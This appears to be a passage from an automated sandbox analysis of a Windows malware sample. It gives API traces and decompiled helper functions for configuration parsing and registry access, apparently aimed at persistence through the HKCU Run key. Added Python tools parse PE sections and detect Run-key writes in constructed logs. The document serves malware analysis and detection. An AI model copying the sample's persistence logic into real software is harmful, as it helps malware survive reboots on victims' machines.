                                      • Opcode Fuzzy Hash: 64b709466c9193492a36f763d1be78b7964447ad9fc1555b37430d01af4d637a
                                      • Instruction Fuzzy Hash: 69F0B435640288BBCB155F51DC05FAEBF65EF04720B004168FC191B160DF725E11ABC0
                                      Uniqueness

                                      Uniqueness Score: 0.05%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.578723047.00CC1000.00000020.00020000.sdmp, Offset: 00CC0000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_cc0000_images.jbxd
                                      Similarity
                                      • API ID: Alloc
                                      • String ID: FlsAlloc
                                      • API String ID: 2773662609-671089009
                                      • Opcode ID: 616f264568251ea57483094537e6d6c583022a39d827c00a37e323699ba805d3
                                      • Instruction ID: 6ae2c782bed3d83e088ed3c9a15a5a8fadd9c6b05d0a0d47c8d858b8572f3125
                                      • Opcode Fuzzy Hash: 616f264568251ea57483094537e6d6c583022a39d827c00a37e323699ba805d3
                                      • Instruction Fuzzy Hash: 67E0E531A81398778319EB62DD06F7EBB94CB14721B0002ACFC095B290CE656F0196D5
                                      Uniqueness

                                      Uniqueness Score: 0.07%

                                      APIs
                                      • try_get_function.LIBVCRUNTIME ref: 00CC24B1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.578723047.00CC1000.00000020.00020000.sdmp, Offset: 00CC0000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_cc0000_images.jbxd
                                      Similarity
                                      • API ID: try_get_function
                                      • String ID: FlsAlloc
                                      • API String ID: 2742660187-671089009
                                      • Opcode ID: 0e2b85ffe9c88bb52ac6df2e7d79669aed979359fdaa5f980fe315520c4804b5
                                      • Instruction ID: ba4d82dbc84e4765e4a96c504b0d609dc3d18d3f89efd1675317f92bb20d752b
                                      • Opcode Fuzzy Hash: 0e2b85ffe9c88bb52ac6df2e7d79669aed979359fdaa5f980fe315520c4804b5
                                      • Instruction Fuzzy Hash: A3D05B32BC13A863C5192696BC06F9D7A4CCB00BB3F0400F1FB0C5557099994D105AD1
                                      Uniqueness

                                      Uniqueness Score: 0.35%

                                      C-Code - Quality: 100%
                                      			/* Decompiled by Joe Sandbox; comments added. The E004xxxxx helpers are not resolved
                                      			   in the dump, so this block is a reading aid rather than compilable code. After a
                                      			   500 ms sleep it locates a ".bss"-named block, then walks a buffer returned by
                                            			   E004354F2 as a sequence of fields (a 4-byte length followed by that many bytes, or
                                      			   fixed 1- and 4-byte values) and stores each field into the object at __ecx. */
                                      			E004355A0(char __ecx, void* __edx, void* __eflags) {
                                      				char _v8;
                                      				char _v12;
                                      				char _v16;
                                      				char _v24;
                                      				intOrPtr _v48;
                                      				intOrPtr _v52;
                                      				intOrPtr _v56;
                                      				char _v76;
                                      				char _v100;
                                      				char _v108;
                                      				char _v148;
                                      				void* _t83;
                                      				void* _t94;
                                      				void* _t102;
                                      				void* _t106;
                                      				intOrPtr* _t126;
                                      				intOrPtr _t165;   /* was used below without a declaration */
                                      				char _t175;
                                      				void* _t176;
                                      				void* _t177;
                                      				void* _t178;
                                      				void* _t179;
                                      				void* _t180;
                                      				void* _t181;
                                      				void* _t182;
                                      				intOrPtr _t184;
                                      				intOrPtr _t185;
                                      				intOrPtr _t186;
                                      				intOrPtr _t187;
                                      				intOrPtr* _t188;
                                      				void* _t189;
                                      
                                      				_t189 = __eflags;
                                      				_t175 = __ecx;
                                      				_v8 = __ecx;
                                      				Sleep(0x1f4); // executed  (0x1f4 = 500 ms)
                                      				E0043E3ED(&_v100, _t189);
                                      				E0043E2E4(&_v100, E0043FBFC()); // executed
                                      				_t83 = E004331EC(&_v12, ".bss"); // executed
                                      				E0043E257(&_v100, &_v148, _t83); // executed
                                      				E00435A2D(_v12);
                                      				E00432E79(&_v16, &_v108);
                                      				E00432CCC(_t175 + 0x44, &_v16);
                                      				E00432E66(&_v16);
                                      				E004354F2(_t175, &_v24);
                                      				_t126 = _v24;                     /* start of the field buffer */
                                      				_t184 = *_t126;                   /* 4-byte length of field 1 */
                                      				_t94 = E0043FC1E(&_v12, _t126 + 4, _t184); // executed  (field 1 bytes follow the length)
                                      				E00433264(_t175 + 0x10, _t94); // executed
                                      				E00435A2D(_v12);
                                      				_t176 = _t184 + 4;                /* cursor past field 1 */
                                      				*((intOrPtr*)(_v8 + 0x14)) = *((intOrPtr*)(_t126 + _t176));          /* 4-byte value */
                                      				_t185 = *((intOrPtr*)(_t126 + _t176 + 4));                            /* length of field 2 */
                                      				_t177 = _t176 + 8;
                                      				E00433264(_v8 + 0x28, E0043FC1E(&_v12, _t126 + _t177, _t185));
                                      				E00435A2D(_v12);
                                      				_t178 = _t177 + _t185;
                                      				*((intOrPtr*)(_v8 + 0x18)) = *((char*)(_t126 + _t178));              /* 1-byte value */
                                      				_t186 = *((intOrPtr*)(_t126 + _t178 + 1));                            /* length of field 3 */
                                      				_t179 = _t178 + 5;
                                      				_t102 = E0043FC1E(&_v12, _t126 + _t179, _t186); // executed
                                      				E00433264(_v8 + 0x1c, _t102); // executed
                                      				E00435A2D(_v12);
                                      				_t180 = _t179 + _t186;
                                      				*((intOrPtr*)(_v8 + 0x20)) = *((char*)(_t126 + _t180));              /* 1-byte value */
                                      				_t187 = *((intOrPtr*)(_t126 + _t180 + 1));                            /* length of field 4 */
                                      				_t181 = _t180 + 5;
                                      				_t106 = E0043FC1E(&_v12, _t126 + _t181, _t187); // executed
                                      				E00433264(_v8 + 0x24, _t106); // executed
                                      				E00435A2D(_v12);
                                      				_t182 = _t181 + _t187;
                                      				_t188 = _v8;
                                      				*((intOrPtr*)(_t188 + 0x2c)) = *((intOrPtr*)(_t126 + _t182));        /* 4-byte value */
                                      				*((intOrPtr*)(_t188 + 0x34)) = *((char*)(_t126 + _t182 + 4));        /* four 1-byte values */
                                      				*((intOrPtr*)(_t188 + 0x38)) = *((char*)(_t126 + _t182 + 5));
                                      				*((intOrPtr*)(_t188 + 0x3c)) = *((char*)(_t126 + _t182 + 6));
                                      				*((intOrPtr*)(_t188 + 0x40)) = *((char*)(_t126 + _t182 + 7));
                                      				/* last field: 4-byte length at +8, bytes at +12 */
                                      				E0043FC1E(&_v8, _t126 + 4 + _t182 + 8, *((intOrPtr*)(_t126 + _t182 + 8))); // executed
                                      				E00433264(_t188 + 0x30, &_v8); // executed
                                      				*_t188 = 1;
                                      				*((intOrPtr*)(_t188 + 4)) = 1;
                                      				E00435A2D(_v8);
                                      				E00432E66(&_v24);
                                      				E00432E66(&_v108);
                                      				_t165 = _v56;
                                      				if(_v56 != 0) {
                                      					E00431DB4(_t165, _t165);
                                      				}
                                      				_v56 = 0;
                                      				_v48 = 0;
                                      				_v52 = 0;
                                      				E00432E66(&_v76);
                                      				return E0043DE8B(&_v100, 0);
                                      			}
                                      Instruction addresses for the listing above: 0x004355a0 .. 0x00435778

                                      APIs
                                      • Sleep.KERNEL32(000001F4,?,?,00000000), ref: 004355B6
                                        • Part of subcall function 0043FBFC: MessageBoxA.USER32(00000000,Settings not found !,DEBUG,00000000), ref: 0043FC14
                                        • Part of subcall function 004331EC: lstrlenA.KERNEL32(?,?,?,004355DF,.bss,00000000,?,?,00000000), ref: 004331F5
                                        • Part of subcall function 004331EC: lstrlenA.KERNEL32(?,?,?,004355DF,.bss,00000000,?,?,00000000), ref: 00433202
                                        • Part of subcall function 004331EC: lstrcpyA.KERNEL32(00000000,?,?,?,004355DF,.bss,00000000,?,?,00000000), ref: 00433215
                                        • Part of subcall function 00435A2D: VirtualFree.KERNELBASE(00000000,00000000,00008000,0043E2AE,?,?,?,?,?,00000000), ref: 00435A35
                                        • Part of subcall function 00433264: lstrcpyW.KERNEL32(00000000,00000000), ref: 00433289
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.577692381.00431000.00000020.00000001.sdmp, Offset: 00430000, based on PE: true
                                      • Associated: 00000003.00000002.577686049.00430000.00000004.00000001.sdmp
                                      • Associated: 00000003.00000002.577710609.00442000.00000002.00000001.sdmp
                                      • Associated: 00000003.00000002.577718723.00446000.00000004.00000001.sdmp
                                      • Associated: 00000003.00000002.577725352.00448000.00000002.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_430000_images.jbxd
                                      Similarity
                                      • API ID: lstrcpylstrlen$FreeMessageSleepVirtual
                                      • String ID: .bss
                                      • API String ID: 413233750-3890483948
                                      • Opcode ID: c0d1b6ce4ca0b104dd5544cb3f809ce99e8ef7766c747fd1f0be86af13855076
                                      • Instruction ID: b6f1aff6761c573c0eecdc1211f7fa7820bddefa51f94b635ef95e8c01bb2584
                                      • Opcode Fuzzy Hash: c0d1b6ce4ca0b104dd5544cb3f809ce99e8ef7766c747fd1f0be86af13855076
                                      • Instruction Fuzzy Hash: B6515F71901109EFCB04EFA5D9D18EEB7B5BF48308F1051AEE416AB242EF34AB45CB94
                                      Uniqueness

                                      Uniqueness Score: 100.00%
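The listing above hands the section name `.bss` to the string helper at 004331EC, and a subcall (0043FBFC) carries a `Settings not found !` debug message box, which suggests the sample locates a PE section by name to reach its settings. The Python below is an added example, not code from the sample or from this report: it walks the PE section table of a dumped image and returns the raw bytes of a named section, so the analyst can pull that region out for further decoding. The embedded image is constructed (two sections, with data deliberately placed in `.bss` to stand in for an embedded configuration); a real `.bss` is normally uninitialised, has no data on disk, and comes back empty. That the sample keeps its configuration in that section is an assumption the report does not confirm.

```python
import struct

# Fixed-size pieces of the PE/COFF layout (from the PE format specification).
DOS_SIGNATURE = b"MZ"
NT_SIGNATURE = b"PE\0\0"
COFF_HEADER_FMT = "<HHIIIHH"          # Machine, NumberOfSections, TimeDateStamp, ...
COFF_HEADER_SIZE = struct.calcsize(COFF_HEADER_FMT)         # 20
SECTION_HEADER_FMT = "<8sIIIIIIHHI"   # Name, VirtualSize, VirtualAddress, SizeOfRawData, PointerToRawData, ...
SECTION_HEADER_SIZE = struct.calcsize(SECTION_HEADER_FMT)   # 40


def parse_sections(image: bytes) -> list:
    """Return one dict per entry in the section table of a PE image."""
    if image[:2] != DOS_SIGNATURE:
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", image, 0x3C)[0]
    if image[e_lfanew:e_lfanew + 4] != NT_SIGNATURE:
        raise ValueError("missing PE signature")
    coff_off = e_lfanew + 4
    _machine, num_sections, _ts, _symtab, _nsyms, opt_size, _flags = struct.unpack_from(
        COFF_HEADER_FMT, image, coff_off)
    table_off = coff_off + COFF_HEADER_SIZE + opt_size      # section table follows the optional header
    sections = []
    for i in range(num_sections):
        fields = struct.unpack_from(SECTION_HEADER_FMT, image, table_off + i * SECTION_HEADER_SIZE)
        name, vsize, vaddr, raw_size, raw_off = fields[:5]
        sections.append({
            "name": name.rstrip(b"\0").decode("ascii", "replace"),
            "virtual_size": vsize,
            "virtual_address": vaddr,
            "raw_size": raw_size,
            "raw_offset": raw_off,
        })
    return sections


def section_bytes(image: bytes, name: str) -> bytes:
    """Raw file bytes of the named section, or b"" if it is absent or has no data on disk."""
    for sec in parse_sections(image):
        if sec["name"] == name:
            # An ordinary .bss is uninitialised: SizeOfRawData is 0, so this slice is empty.
            return image[sec["raw_offset"]:sec["raw_offset"] + sec["raw_size"]]
    return b""


def build_sample_image() -> bytes:
    """Constructed minimal PE32 image (not a real sample) whose .bss carries raw data."""
    e_lfanew = 0x40
    opt_size = 0xE0                                   # PE32 optional header size
    dos_header = DOS_SIGNATURE + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    coff = struct.pack(COFF_HEADER_FMT, 0x14C, 2, 0, 0, 0, opt_size, 0x0102)
    optional = struct.pack("<H", 0x10B) + b"\0" * (opt_size - 2)   # PE32 magic, rest zeroed
    headers_end = e_lfanew + 4 + COFF_HEADER_SIZE + opt_size + 2 * SECTION_HEADER_SIZE
    raw_base = (headers_end + 0x1FF) & ~0x1FF        # first section data on a 0x200 boundary
    text_data = b"\xC3" * 0x10                        # placeholder code bytes
    bss_data = b"CONSTRUCTED-CONFIG-BLOB\0" + b"\0" * 8
    text_hdr = struct.pack(SECTION_HEADER_FMT, b".text", len(text_data), 0x1000,
                           len(text_data), raw_base, 0, 0, 0, 0, 0x60000020)
    bss_hdr = struct.pack(SECTION_HEADER_FMT, b".bss", len(bss_data), 0x2000,
                          len(bss_data), raw_base + len(text_data), 0, 0, 0, 0, 0xC0000080)
    headers = dos_header + NT_SIGNATURE + coff + optional + text_hdr + bss_hdr
    return headers.ljust(raw_base, b"\0") + text_data + bss_data


if __name__ == "__main__":
    import sys
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample_image()
    for sec in parse_sections(data):
        print(f"{sec['name']:<8} raw_off=0x{sec['raw_offset']:x} raw_size=0x{sec['raw_size']:x}")
    print(section_bytes(data, ".bss")[:32])
```

Run it against a memory dump or the original file to list the sections and print the head of `.bss`; on a dump taken from memory, remember that the offsets in the table are file offsets, so map them through the section's virtual address instead if the dump is image-aligned.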

                                      APIs
                                        • Part of subcall function 00CC8EED: _free.LIBCMT ref: 00CC8F4D
                                        • Part of subcall function 00CC8B66: GetOEMCP.KERNEL32(00000000,00CC8DED,?,00CC4B35,00D92144,00D92144,00CC4B35), ref: 00CC8B91
                                      • _free.LIBCMT ref: 00CC8E4A
                                      • _free.LIBCMT ref: 00CC8E80
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.578723047.00CC1000.00000020.00020000.sdmp, Offset: 00CC0000, based on PE: true
                                      • Associated: 00000003.00000002.578708562.00CC0000.00000002.00020000.sdmp
                                      • Associated: 00000003.00000002.578805483.00CE2000.00000002.00020000.sdmp
                                      • Associated: 00000003.00000002.578834966.00CEB000.00000004.00020000.sdmp
                                      • Associated: 00000003.00000002.578847102.00CEC000.00000008.00020000.sdmp
                                      • Associated: 00000003.00000002.578856272.00CED000.00000004.00020000.sdmp
                                      • Associated: 00000003.00000002.578871909.00CEF000.00000008.00020000.sdmp
                                      • Associated: 00000003.00000002.578928306.00D80000.00000004.00020000.sdmp
                                      • Associated: 00000003.00000002.578946601.00D81000.00000008.00020000.sdmp
                                      • Associated: 00000003.00000002.578962758.00D84000.00000004.00020000.sdmp
                                      • Associated: 00000003.00000002.578971084.00D85000.00000008.00020000.sdmp
                                      • Associated: 00000003.00000002.578988900.00D87000.00000004.00020000.sdmp
                                      • Associated: 00000003.00000002.579002903.00D89000.00000008.00020000.sdmp
                                      • Associated: 00000003.00000002.579026291.00D8D000.00000004.00020000.sdmp
                                      • Associated: 00000003.00000002.579044316.00D8E000.00000008.00020000.sdmp
                                      • Associated: 00000003.00000002.579062903.00D91000.00000004.00020000.sdmp
                                      • Associated: 00000003.00000002.579083023.00D93000.00000002.00020000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_cc0000_images.jbxd
                                      Similarity
                                      • API ID: _free
                                      • String ID:
                                      • API String ID: 269201875-0
                                      • Opcode ID: c1c795604de53c7bc22823a0464b17150f39aae159bfb0dd2241ab9ee59ac028
                                      • Instruction ID: 7e1f9e6b5d2f6c6bf0beb9110ae974c8f22ad1553287ed996afc215063d12f2b
                                      • Opcode Fuzzy Hash: c1c795604de53c7bc22823a0464b17150f39aae159bfb0dd2241ab9ee59ac028
                                      • Instruction Fuzzy Hash: DF31B276900249AFCB11EF99C841FAF77E4EF44324F15015EF924AB2A1EB319D54DB50
                                      Uniqueness

                                      Uniqueness Score: 0.03%

                                      Memory Dump Source
                                      • Source File: 00000003.00000002.578723047.00CC1000.00000020.00020000.sdmp, Offset: 00CC0000, based on PE: true
                                      • Associated: 00000003.00000002.578708562.00CC0000.00000002.00020000.sdmp
                                      • Associated: 00000003.00000002.578805483.00CE2000.00000002.00020000.sdmp
                                      • Associated: 00000003.00000002.578834966.00CEB000.00000004.00020000.sdmp
                                      • Associated: 00000003.00000002.578847102.00CEC000.00000008.00020000.sdmp
                                      • Associated: 00000003.00000002.578856272.00CED000.00000004.00020000.sdmp
                                      • Associated: 00000003.00000002.578871909.00CEF000.00000008.00020000.sdmp
                                      • Associated: 00000003.00000002.578928306.00D80000.00000004.00020000.sdmp
                                      • Associated: 00000003.00000002.578946601.00D81000.00000008.00020000.sdmp
                                      • Associated: 00000003.00000002.578962758.00D84000.00000004.00020000.sdmp
                                      • Associated: 00000003.00000002.578971084.00D85000.00000008.00020000.sdmp
                                      • Associated: 00000003.00000002.578988900.00D87000.00000004.00020000.sdmp
                                      • Associated: 00000003.00000002.579002903.00D89000.00000008.00020000.sdmp
                                      • Associated: 00000003.00000002.579026291.00D8D000.00000004.00020000.sdmp
                                      • Associated: 00000003.00000002.579044316.00D8E000.00000008.00020000.sdmp
                                      • Associated: 00000003.00000002.579062903.00D91000.00000004.00020000.sdmp
                                      • Associated: 00000003.00000002.579083023.00D93000.00000002.00020000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_cc0000_images.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 2c0b8313afc90c22356557142839663577100fcd6f0edb01569c199ecd99ca51
                                      • Instruction ID: 92231f5ee94111ace5b377e8de1da19602b122969c37e20d94bcf4bf8a3746da
                                      • Opcode Fuzzy Hash: 2c0b8313afc90c22356557142839663577100fcd6f0edb01569c199ecd99ca51
                                      • Instruction Fuzzy Hash: 4F01F1776002559F9B2ACF2AED80F5B33DAEB85320B648129FA25CB194DA30DD419690
                                      Uniqueness

                                      Uniqueness Score: 0.00%

                                      C-Code - Quality: 91%
                                      			E00433381(short** __ecx, intOrPtr _a4) {
                                      				short** _v8;
                                      				char* _t12;
                                      				void* _t15;
                                      				int _t35;
                                      				short** _t36;
                                      
                                      				_push(__ecx);
                                      				_v8 = __ecx;
                                      				E00432FF0(_a4);
                                      				if( *__ecx != 0) {
                                      					_t35 = WideCharToMultiByte(0, 0x200,  *__ecx, E0043308E(__ecx), 0, 0, 0, 0);
                                      					_t12 = E00435A3C(_t35);
                                      					_t36 = _v8;
                                      					_t22 = _t12;
                                      					WideCharToMultiByte(0xfde9, 0,  *_t36, E0043308E(_t36), _t12, _t35, 0, 0);
                                      					_t15 = E004331EC( &_v8, _t22); // executed
                                      					E00432F52(_a4, _t15); // executed
                                      					E00435A2D(_v8);
                                      					E00435A2D(_t22);
                                      				}
                                      				return _a4;
                                      			}
                                      Instruction addresses for the listing above: 0x00433384 .. 0x00433406

                                      APIs
                                        • Part of subcall function 0043308E: lstrlenW.KERNEL32(?,00433473,?,?,?,0043F311,?,00000000,Software\Microsoft\Windows\CurrentVersion\Explorer\,?,?,?,00000000), ref: 00433095
                                      • WideCharToMultiByte.KERNEL32(00000000,00000200,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00434AC0,?), ref: 004333AE
                                        • Part of subcall function 00435A3C: VirtualAlloc.KERNEL32(00000000,?,00003000,00000004,0043347F,?,?,?,0043F311,?,00000000,Software\Microsoft\Windows\CurrentVersion\Explorer\,?,?,?,00000000), ref: 00435A46
                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00434AC0,?,?,?,?,?), ref: 004333D9
                                        • Part of subcall function 004331EC: lstrlenA.KERNEL32(?,?,?,004355DF,.bss,00000000,?,?,00000000), ref: 004331F5
                                        • Part of subcall function 004331EC: lstrlenA.KERNEL32(?,?,?,004355DF,.bss,00000000,?,?,00000000), ref: 00433202
                                        • Part of subcall function 004331EC: lstrcpyA.KERNEL32(00000000,?,?,?,004355DF,.bss,00000000,?,?,00000000), ref: 00433215
                                        • Part of subcall function 00432F52: lstrcatA.KERNEL32(00000000,?,?,00000000,?,004333F1,00000000,00000000,?,00434AC0,?,?,?,?,?), ref: 00432F7E
                                        • Part of subcall function 00435A2D: VirtualFree.KERNELBASE(00000000,00000000,00008000,0043E2AE,?,?,?,?,?,00000000), ref: 00435A35
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.577692381.00431000.00000020.00000001.sdmp, Offset: 00430000, based on PE: true
                                      • Associated: 00000003.00000002.577686049.00430000.00000004.00000001.sdmp
                                      • Associated: 00000003.00000002.577710609.00442000.00000002.00000001.sdmp
                                      • Associated: 00000003.00000002.577718723.00446000.00000004.00000001.sdmp
                                      • Associated: 00000003.00000002.577725352.00448000.00000002.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_430000_images.jbxd
                                      Similarity
                                      • API ID: lstrlen$ByteCharMultiVirtualWide$AllocFreelstrcatlstrcpy
                                      • String ID:
                                      • API String ID: 346377423-0
                                      • Opcode ID: f564063857ccbbfed09e6d1b06120fd76ebb38e3e6a41739f98540f42ea4e214
                                      • Instruction ID: d7e1f2d09106f8b5ae63c174f7cddd8cc8517eb281cab2d2c19e85e545963e67
                                      • Opcode Fuzzy Hash: f564063857ccbbfed09e6d1b06120fd76ebb38e3e6a41739f98540f42ea4e214
                                      • Instruction Fuzzy Hash: 5601DD71300114B7CB15BFA6DD82FAE7A6DAF0D704F10102EB5059B182CAB85E00D79D
                                      Uniqueness

                                      Uniqueness Score: 0.12%

                                      C-Code - Quality: 85%
                                      			E0043EF61(void** __ecx, void* __edx, short** _a4, intOrPtr _a8) {
                                      				int _v8;
                                      				int _v12;
                                      				long _t13;
                                      				void* _t14;
                                      				long _t18;
                                      				short** _t22;
                                      				void** _t30;
                                      
                                      				_push(__ecx);
                                      				_push(__ecx);
                                      				_t22 = _a4;
                                      				_t30 = __ecx;
                                      				_v8 = 0;
                                      				_v12 = 0;
                                      				_t13 = RegQueryValueExW( *__ecx,  *_t22, 0,  &_v12, 0,  &_v8); // executed
                                      				if(_t13 != 0) {
                                      					L3:
                                      					_t14 = 0;
                                      				} else {
                                      					_t34 = E00435ADB(_v8);
                                      					_t18 = RegQueryValueExW( *_t30,  *_t22, 0,  &_v12, _t15,  &_v8); // executed
                                      					if(_t18 != 0) {
                                      						goto L3;
                                      					} else {
                                      						E00432DC1(_a8, _t34, _v8);
                                      						_t14 = 1;
                                      					}
                                      				}
                                      				return _t14;
                                      			}
                                      Instruction addresses for the listing above: 0x0043ef64 .. 0x0043efc8

                                      APIs
                                      • RegQueryValueExW.KERNEL32(?,?,00000000,?,00000000,00000000,?,00000000,?,?,?,?,0043F3B9,?,0000000A,80000001), ref: 0043EF84
                                        • Part of subcall function 00435ADB: GetProcessHeap.KERNEL32(00000000,000000F4,0043E415,?,?,00000000,004355C4,?,?,00000000), ref: 00435ADE
                                        • Part of subcall function 00435ADB: HeapAlloc.KERNEL32(00000000,?,00000000,004355C4,?,?,00000000), ref: 00435AE5
                                      • RegQueryValueExW.KERNEL32(?,?,00000000,?,00000000,00000000,?,0043F3B9,?,0000000A,80000001,?,000F003F,00000000,00000000,Software\Microsoft\Windows\CurrentVersion\Run\), ref: 0043EFA7
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.577692381.00431000.00000020.00000001.sdmp, Offset: 00430000, based on PE: true
                                      • Associated: 00000003.00000002.577686049.00430000.00000004.00000001.sdmp
                                      • Associated: 00000003.00000002.577710609.00442000.00000002.00000001.sdmp
                                      • Associated: 00000003.00000002.577718723.00446000.00000004.00000001.sdmp
                                      • Associated: 00000003.00000002.577725352.00448000.00000002.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_430000_images.jbxd
                                      Similarity
                                      • API ID: HeapQueryValue$AllocProcess
                                      • String ID:
                                      • API String ID: 174754664-0
                                      • Opcode ID: 752a47bd553aec661c870ba33c4b2374832861da8af2b225468ab1205bfa92c2
                                      • Instruction ID: eb1f50b2d82113de750b9dcf4efc04a96a2eaea637ce814cd3c63cf103aaacc1
                                      • Opcode Fuzzy Hash: 752a47bd553aec661c870ba33c4b2374832861da8af2b225468ab1205bfa92c2
                                      • Instruction Fuzzy Hash: 45011A76600118BFAB15DBA2CC85DAF7BBCEF49354F20006AF502D6250E6B1AE04EB64
                                      Uniqueness

                                      Uniqueness Score: 0.03%

                                      C-Code - Quality: 100%
                                      			E0043EFFE(void** __ecx, void* _a4, short** _a8, int _a12, int _a16) {
                                      				long _t10;
                                      				short** _t22;
                                      				void** _t23;
                                      
                                      				_t23 = __ecx;
                                      				_t22 = _a8;
                                      				if(_a16 == 0 || E0043D721(_a4, _t22) != 0) {
                                      					L4:
                                      					_t10 = RegOpenKeyExW(_a4,  *_t22, 0, _a12, _t23); // executed
                                      					if(_t10 != 0) {
                                      						goto L6;
                                      					}
                                      					return _t10 + 1;
                                      				} else {
                                      					_a16 = 0;
                                      					if(RegCreateKeyExW(_a4,  *_t22, 0, 0, 0, _a12, 0, __ecx,  &_a16) != 0) {
                                      						L6:
                                      						return 0;
                                      					}
                                      					E0043EF4C(_t23);
                                      					goto L4;
                                      				}
                                      			}
                                      Instruction addresses for the listing above: 0x0043f005 .. 0x0043f05a

                                      APIs
                                      • RegOpenKeyExW.KERNEL32(?,?,00000000,?,?,?,?,?,?,0043F392,80000001,?,000F003F,00000000,00000000,Software\Microsoft\Windows\CurrentVersion\Run\), ref: 0043F04D
                                        • Part of subcall function 0043D721: RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,00000000,?,?,0043F01A,?,?,?,?,0043F392,80000001,?,000F003F), ref: 0043D737
                                      • RegCreateKeyExW.ADVAPI32(?,?,00000000,00000000,00000000,?,00000000,?,?,?,?,?,?,0043F392,80000001,?), ref: 0043F032
                                        • Part of subcall function 0043EF4C: RegCloseKey.ADVAPI32(?,?,0043F043,?,0043F392,80000001,?,000F003F,00000000,00000000,Software\Microsoft\Windows\CurrentVersion\Run\,00000000,InitWindows,00000000,inst,?), ref: 0043EF56
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.577692381.00431000.00000020.00000001.sdmp, Offset: 00430000, based on PE: true
                                      • Associated: 00000003.00000002.577686049.00430000.00000004.00000001.sdmp
                                      • Associated: 00000003.00000002.577710609.00442000.00000002.00000001.sdmp
                                      • Associated: 00000003.00000002.577718723.00446000.00000004.00000001.sdmp
                                      • Associated: 00000003.00000002.577725352.00448000.00000002.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_430000_images.jbxd
                                      Similarity
                                      • API ID: Open$CloseCreate
                                      • String ID:
                                      • API String ID: 1752019758-0
                                      • Opcode ID: 5ad5d0e7789217ee7a88bd24d9ae03935943760d82e616e749edb308f54d4f8e
                                      • Instruction ID: 5d205d8c47116aec07be11496a031d29fb52010b7f48d0ae6d73445f7d414c00
                                      • Opcode Fuzzy Hash: 5ad5d0e7789217ee7a88bd24d9ae03935943760d82e616e749edb308f54d4f8e
                                      • Instruction Fuzzy Hash: B401AD3160410DBFAB108F66DC80CBB3B6DEF09398B10503AF90891211E775DD259AA4
                                      Uniqueness

                                      Uniqueness Score: 0.24%
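E0043EFFE opens a key, creating it first when E0043D721 reports it absent, and E0043EF61 then reads a value from it with the usual two-call RegQueryValueExW pattern (size query, then the read into a heap buffer). The call sites recorded in the API lists show these helpers used with HKEY_CURRENT_USER (0x80000001), KEY_ALL_ACCESS (0x000F003F) and `Software\Microsoft\Windows\CurrentVersion\Run\`, the per-user autostart key. The Python below is an added detection example, not part of this report or of the sample: it scans constructed, simplified Sysmon-style registry events (Event ID 13, value set) for writes under `Run` or `RunOnce` whose command points outside `Program Files` and `Windows`, which is where a dropped executable usually lives. The log format, SIDs, paths and value names are all invented for the example.

```python
import re

# Autostart value paths under any hive (HKU\<SID>\... for per-user, HKLM\... for machine-wide).
RUN_KEY_RE = re.compile(
    r"\\software\\microsoft\\windows\\currentversion\\(run|runonce)\\([^\\]+)$",
    re.IGNORECASE,
)
# Directories a legitimately installed autostart command is expected to live under.
TRUSTED_DIR_RE = re.compile(
    r'^"?[a-z]:\\(program files( \(x86\))?|windows)\\', re.IGNORECASE)


def parse_event(line: str) -> dict:
    """Parse one 'Field=value|Field=value' line (a simplified, constructed Sysmon-like format)."""
    fields = {}
    for part in line.strip().split("|"):
        key, _, value = part.partition("=")
        fields[key.strip()] = value.strip()
    return fields


def find_run_key_persistence(lines) -> list:
    """Flag Event ID 13 (registry value set) events that install a Run/RunOnce autostart
    whose command lies outside Program Files and Windows."""
    hits = []
    for line in lines:
        ev = parse_event(line)
        if ev.get("EventID") != "13" or ev.get("EventType") != "SetValue":
            continue                               # value writes only; key creation is ID 12
        match = RUN_KEY_RE.search(ev.get("TargetObject", ""))
        if not match:
            continue                               # not an autostart value
        command = ev.get("Details", "")
        if TRUSTED_DIR_RE.match(command):
            continue                               # vendor-installed entry: lower priority
        hits.append({
            "image": ev.get("Image", ""),
            "key": match.group(1),
            "value_name": match.group(2),
            "command": command,
        })
    return hits


# Constructed sample events; SIDs, paths and value names are invented for the example.
SAMPLE_LOG = [
    r"EventID=13|EventType=SetValue|Image=C:\Users\victim\AppData\Local\Temp\dropper.exe"
    r"|TargetObject=HKU\S-1-5-21-1111-2222-3333-1001\Software\Microsoft\Windows\CurrentVersion\Run\UpdateSvc"
    r"|Details=C:\Users\victim\AppData\Roaming\svchost32.exe",
    r"EventID=13|EventType=SetValue|Image=C:\Program Files\Vendor\setup.exe"
    r"|TargetObject=HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\VendorTray"
    r'|Details="C:\Program Files\Vendor\tray.exe" /background',
    r"EventID=13|EventType=SetValue|Image=C:\Windows\explorer.exe"
    r"|TargetObject=HKU\S-1-5-21-1111-2222-3333-1001\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden"
    r"|Details=DWORD (0x00000001)",
    r"EventID=12|EventType=CreateKey|Image=C:\Users\victim\Downloads\invoice.exe"
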